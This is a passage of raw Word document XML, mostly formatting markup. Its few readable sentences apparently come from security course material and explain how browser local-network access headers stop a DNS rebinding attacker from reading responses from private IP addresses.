          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address and, after the DNS rebinding, makes a request to the same origin, which then resolves to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP address. As such, the targeted IP address is </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>less public</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the browser sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Access-Control-Request-Local-Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02175E6E" w14:textId="77777777" w:rsidR="00233303" w:rsidRPr="00233303" w:rsidRDefault="00233303" w:rsidP="00233303">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r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The web browser tightens the Same-Origin policy if the targeted web application does not explicitly allow the response to be shared with the external network by setting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Local-Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> header. It prevents JavaScript code running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http://attacker.htb</w:t>
      </w:r>
      <w:r w:rsidRPr="00233303">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> from accessing the response, even though the origin is the same. Thus, the attacker is unable to exfiltrate the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C609178" w14:textId="77777777" w:rsidR="00213442" w:rsidRPr="00C56D59" w:rsidRDefault="00213442" w:rsidP="00C56D59">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="00C56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70D73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F34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D44E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C81A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604089">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="55740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9"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00233303"/>
    <w:rsid w:val="00B84979"/>
    <w:rsid w:val="00C56D5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97F2EEE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{055A2548-D415-4008-9BFF-9B77B44C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3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14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002333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03"/>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233303"/>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233303"/>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styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00233303"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00233303"/>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character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00233303"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00233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233303"/>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233303"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00233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0926">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="124782721">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1458452857">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="500858074">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1594701641">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="584146950">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="21329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1229">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1926643355">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1558325029">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="167064549">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1128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5200">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1039629706">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="83503382">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1590195682">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="735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1398</Words>
  <Characters>7969</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cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-19T09:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-19T09:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>